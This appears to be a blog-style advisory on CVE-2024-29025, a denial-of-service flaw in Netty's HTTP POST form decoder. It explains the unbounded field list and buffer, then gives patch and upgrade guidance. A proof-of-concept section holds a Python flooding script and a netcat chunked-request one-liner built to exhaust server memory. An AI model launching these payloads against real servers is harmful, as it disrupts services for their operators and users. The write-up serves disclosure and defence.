Netty is a powerful Java networking library used to build high-performance network servers and clients. It powers a huge number of projects, from microservices to frameworks such as gRPC and middleware for large platforms. But even robust software can have flaws: in March 2024, Netty 4.1.x releases before 4.1.108.Final were found to contain a weakness that allows a very simple but effective denial-of-service (DoS) attack on servers that decode HTML form POST bodies (such as multipart/form-data uploads) with Netty's `HttpPostRequestDecoder`.

Here’s a deep dive into CVE-2024-29025: how it works and how attackers can exploit it.

## What is Netty?

As the Netty project home page puts it, Netty is “an asynchronous event-driven network application framework for rapid development of maintainable high performance protocol servers & clients.” It takes care of the lower-level plumbing of Java network communication and makes it straightforward to build complex networking applications.



## About the Vulnerability (CVE-2024-29025)

CVE-2024-29025 affects the Netty component that decodes HTTP POST bodies, especially bodies using the multipart/form-data encoding for file uploads and web forms.

At its core, the vulnerability is about how Netty’s `HttpPostRequestDecoder` handles large numbers of form fields:

- As it decodes a POST body, the decoder stores each field in a list (`bodyListHttpData`).
- There is no hard limit on how many fields can be stored, nor on how much memory all the fields can use collectively.
- While file uploads (large blobs) can be written to disk if configured, a POST with *lots* of tiny fields (each just a few bytes) is accumulated in memory.
- The decoder keeps bytes it cannot decode yet in a buffer (`undecodedChunk`) until a complete field arrives, and this buffer can also grow without bound.

### What’s the security risk?

An attacker can send a POST request with an *extreme number* of small fields, forcing the server to consume memory until it runs out (an outright `OutOfMemoryError`) or stalls while processing the request. The result is a DoS: a server crash or a severe slowdown.

## How the Attack Works

The key idea is that the decoder parses the POST body and stores it, field by field, in a list. If you keep sending more fields before the request is complete, you force the server to keep allocating memory for them.

You don’t need big files or big values, just lots and lots of tiny fields.

The most effective approach is a chunked POST (`Transfer-Encoding: chunked`), where the client keeps feeding an *open* request instead of sending a single fixed-length body. Automated, this exhausts the server’s available memory, slowly or quickly depending on the send rate.
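Chunked framing is what lets a client keep one request open indefinitely. The plain-Java sketch below (no Netty dependency; `ChunkedBody` and its methods are illustrative names, not part of any library) shows how each tiny field is framed as its own chunk under HTTP/1.1 chunked transfer coding.

```java
import java.nio.charset.StandardCharsets;

// Minimal sketch of HTTP/1.1 chunked transfer coding (RFC 9112, section 7.1).
// Each chunk is "<size in hex>\r\n<data>\r\n"; a zero-size chunk ends the body,
// so a client that never sends it keeps the request open.
final class ChunkedBody {

    private ChunkedBody() {}

    // Frames one piece of form data as a single chunk.
    static String encodeChunk(String data) {
        // The size line counts bytes, not characters, so measure the UTF-8 encoding.
        int size = data.getBytes(StandardCharsets.UTF_8).length;
        return Integer.toHexString(size) + "\r\n" + data + "\r\n";
    }

    // Builds chunks carrying field1=x&, field2=x&, ..., fieldN=x&.
    // No terminating "0\r\n\r\n" chunk is appended, mirroring an open-ended request.
    static String tinyFieldChunks(int count) {
        StringBuilder body = new StringBuilder();
        for (int i = 1; i <= count; i++) {
            body.append(encodeChunk("field" + i + "=x&"));
        }
        return body.toString();
    }
}
```

For example, `encodeChunk("field10=x&")` produces the size line `a` (10 in hex), so the chunk size has to be computed per field rather than hard-coded.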

## The Affected Code

The bug lives in `HttpPostRequestDecoder` and the multipart and standard (URL-encoded) decoders it delegates to. Here’s a simplified sketch of what happens:

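```java
import io.netty.buffer.ByteBuf;
import io.netty.buffer.Unpooled;
import io.netty.handler.codec.http.HttpContent;
import io.netty.handler.codec.http.multipart.InterfaceHttpData;

import java.util.ArrayList;
import java.util.List;

// Simplified illustration of the pre-4.1.108.Final behaviour, not Netty's actual source.
public abstract class HttpPostRequestDecoder {

    // Every decoded field is kept here until the decoder is destroyed.
    private final List<InterfaceHttpData> bodyListHttpData = new ArrayList<>();

    // Raw bytes that have arrived but do not yet form a complete field.
    private final ByteBuf undecodedChunk = Unpooled.buffer();

    // Called each time a piece of the request body arrives from the network.
    public void offer(HttpContent content) {
        undecodedChunk.writeBytes(content.content()); // no cap on buffered bytes

        // Keep decoding complete fields as data arrives.
        while (undecodedChunk.isReadable()) {
            InterfaceHttpData data = decodeNextField(undecodedChunk);
            if (data == null) {
                break; // next field is incomplete: wait for more data
            }
            bodyListHttpData.add(data); // <-- unbounded growth here!
        }
    }

    // Hypothetical helper: returns the next complete field, or null if more bytes are needed.
    protected abstract InterfaceHttpData decodeNextField(ByteBuf buffer);
}
```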

`undecodedChunk` holds raw bytes that have not been parsed yet, and it has no size limit either.

If a POST body carries thousands or millions of fields, every one of them stays in memory until the request ends and the decoder is cleaned up (`destroy()`).
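To see both growth points without pulling in Netty, here is a toy model in plain Java. It is a hypothetical sketch: `UnboundedFormDecoder` and its methods are invented for illustration, it only understands `&`-separated URL-encoded data, and it skips percent-decoding.

```java
import java.nio.charset.StandardCharsets;
import java.util.ArrayList;
import java.util.List;

// Toy model of the unbounded behaviour, NOT Netty code: a list of decoded fields
// (like bodyListHttpData) and a buffer of not-yet-decodable data (like undecodedChunk),
// with no limit on either.
final class UnboundedFormDecoder {

    private final List<String> fields = new ArrayList<>();
    private final StringBuilder undecoded = new StringBuilder();

    // Called for every piece of body data that arrives.
    void offer(String data) {
        undecoded.append(data);
        int end;
        // Each '&' terminates a complete field: move it from the buffer into the list.
        while ((end = undecoded.indexOf("&")) >= 0) {
            fields.add(undecoded.substring(0, end));
            undecoded.delete(0, end + 1);
        }
        // Anything after the last '&' stays buffered until more data arrives.
    }

    int fieldCount() {
        return fields.size();
    }

    int bufferedBytes() {
        return undecoded.toString().getBytes(StandardCharsets.UTF_8).length;
    }
}
```

Feeding it 100,000 fragments like `f0=x&` leaves 100,000 entries in the list, while a single field that never receives its closing `&` (say `a=` followed by 5,000 bytes) sits entirely in the buffer.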

## Proof of Concept (Exploit Example)

You can reproduce the vulnerability with a simple script. The following Python code uses the third-party `requests` library; for more aggressive chunked POSTs, you could drop down to a lower-level library such as the standard `http.client`.

### Python Exploit Sending Many Tiny Fields

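```python
import requests

# Placeholder URL of a Netty server that decodes POST form bodies
url = "http://target-netty-server/upload"

# Generate 10,000 tiny fields: field_0=x, field_1=x, ...
fields = {f"field_{i}": "x" for i in range(10000)}

# requests sends a dict passed as data= as an application/x-www-form-urlencoded body
response = requests.post(url, data=fields)
print(response.status_code)
```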
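A quick size estimate shows how little bandwidth this takes. The sketch below rebuilds the same `field_<i>=x` body in plain Java and measures it; `FormBodySize` is an illustrative name, and it assumes the dict is encoded in insertion order with `_` left unescaped, which holds for these ASCII-only names.

```java
import java.nio.charset.StandardCharsets;
import java.util.StringJoiner;

// Rebuilds the URL-encoded body of the Python example: field_0=x&field_1=x&...
final class FormBodySize {

    private FormBodySize() {}

    static String body(int fieldCount) {
        StringJoiner joiner = new StringJoiner("&");
        for (int i = 0; i < fieldCount; i++) {
            joiner.add("field_" + i + "=x");
        }
        return joiner.toString();
    }

    // Size of the request body in bytes.
    static int bodyBytes(int fieldCount) {
        return body(fieldCount).getBytes(StandardCharsets.UTF_8).length;
    }
}
```

`FormBodySize.bodyBytes(10000)` returns 128,889: a body of under 130 KB that makes the server create and keep 10,000 separate field objects.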

### More Aggressive: Chunked POST with netcat

To keep sending fields without ever finishing the request, you can write the raw HTTP request yourself and pipe it to netcat (`nc`) against a test server. Each chunk’s size line must match the byte length of its data:

```sh
# Chunk sizes are computed per field; no terminating 0-size chunk is sent, so the request never completes.
(printf 'POST /upload HTTP/1.1\r\nHost: target\r\nTransfer-Encoding: chunked\r\nContent-Type: application/x-www-form-urlencoded\r\n\r\n'; for i in $(seq 1 100000); do f="field$i=x&"; printf '%x\r\n%s\r\n' "${#f}" "$f"; done) | nc target 80
```

This simulates a never-ending flow of fields to the server.

Result:

As Netty keeps growing `bodyListHttpData` and `undecodedChunk`, the JVM heap fills up, and the server may eventually fail with an `OutOfMemoryError`.

## The Patch

The vulnerability was fixed in Netty 4.1.108.Final:

- New configuration options limit how many fields the decoder accepts and how many bytes it buffers while waiting for a field to complete.
- Netty now throws an exception if a request tries to add too many fields or too much data, protecting the server from DoS.
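The idea behind the fix can be modelled in a few lines. This is a hypothetical plain-Java sketch, not Netty's implementation: the class name, the two limits and the use of `IllegalStateException` are assumptions chosen for illustration, so check the 4.1.108.Final release notes for the real constructor parameters and exception types.

```java
import java.nio.charset.StandardCharsets;
import java.util.ArrayList;
import java.util.List;

// Hypothetical model of a bounded decoder: caps the number of decoded fields and the
// bytes buffered for an unfinished field. Names and exception type are illustrative.
final class BoundedFormDecoder {

    private final int maxFields;
    private final int maxBufferedBytes;
    private final List<String> fields = new ArrayList<>();
    private final StringBuilder undecoded = new StringBuilder();

    BoundedFormDecoder(int maxFields, int maxBufferedBytes) {
        this.maxFields = maxFields;
        this.maxBufferedBytes = maxBufferedBytes;
    }

    void offer(String data) {
        undecoded.append(data);
        int end;
        while ((end = undecoded.indexOf("&")) >= 0) {
            // Refuse to store one more field once the limit is reached.
            if (fields.size() >= maxFields) {
                throw new IllegalStateException("too many form fields (limit " + maxFields + ")");
            }
            fields.add(undecoded.substring(0, end));
            undecoded.delete(0, end + 1);
        }
        // Only an unfinished field remains buffered; reject it if it grows too large.
        int buffered = undecoded.toString().getBytes(StandardCharsets.UTF_8).length;
        if (buffered > maxBufferedBytes) {
            throw new IllegalStateException("form field too long (limit " + maxBufferedBytes + " bytes)");
        }
    }

    int fieldCount() {
        return fields.size();
    }
}
```

With limits of 100 fields and 1,024 buffered bytes, the 101st complete field, or a single unfinished field longer than 1,024 bytes, aborts decoding instead of growing the heap.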

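## How to Fix

Upgrade to Netty 4.1.108.Final or later. The vulnerable decoder ships in the `netty-codec-http` module, so bump that artifact if you depend on individual Netty modules rather than `netty-all`, and check the Netty version other libraries pull in transitively.

- For Maven:

```xml
<dependency>
  <groupId>io.netty</groupId>
  <artifactId>netty-all</artifactId>
  <version>4.1.108.Final</version>
</dependency>
```

- For Gradle:

```groovy
implementation 'io.netty:netty-all:4.1.108.Final'
```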

- If you can’t upgrade Netty, put a reverse proxy that enforces request body size limits in front of the server, or patch `HttpPostRequestDecoder` in your own fork.
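If a proxy is not an option, the same body-size idea can be applied inside your own pipeline: cap the total bytes a single request may feed into the decoder. Since every field costs some bytes on the wire, a byte budget also bounds the field count and the undecoded buffer. This is a hypothetical sketch; `RequestBodyBudget` is not a Netty class, and the handler wiring mentioned in the comments is an assumption.

```java
// Hypothetical per-request byte budget for servers that cannot upgrade yet.
// Assumed wiring: in your handler, call tryConsume(content.content().readableBytes())
// before decoder.offer(content), and reject the request when it returns false.
final class RequestBodyBudget {

    private final long maxBytes;
    private long consumed;
    private boolean exhausted;

    RequestBodyBudget(long maxBytes) {
        if (maxBytes < 0) {
            throw new IllegalArgumentException("maxBytes must be non-negative");
        }
        this.maxBytes = maxBytes;
    }

    // Returns false once the running total would exceed the budget, and keeps
    // returning false afterwards so a rejected request cannot resume.
    boolean tryConsume(int bytes) {
        // Comparing against the remaining budget avoids overflowing consumed + bytes.
        if (exhausted || bytes < 0 || bytes > maxBytes - consumed) {
            exhausted = true;
            return false;
        }
        consumed += bytes;
        return true;
    }
}
```

A budget of 100 bytes accepts a 60-byte chunk, rejects a following 50-byte chunk, and then rejects everything else for that request.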


---

## Conclusion

CVE-2024-29025 is a potent reminder that “unbounded” data structures in a server environment are a classic vector for denial of service. If you use Netty (directly or through libraries), upgrade immediately to 4.1.108.Final or later.

Don’t assume libraries always guard against resource exhaustion; configure every layer of your stack defensively!


## Timeline

- Published on: 03/25/2024 20:15:08 UTC
- Last modified on: 03/26/2024 12:55:05 UTC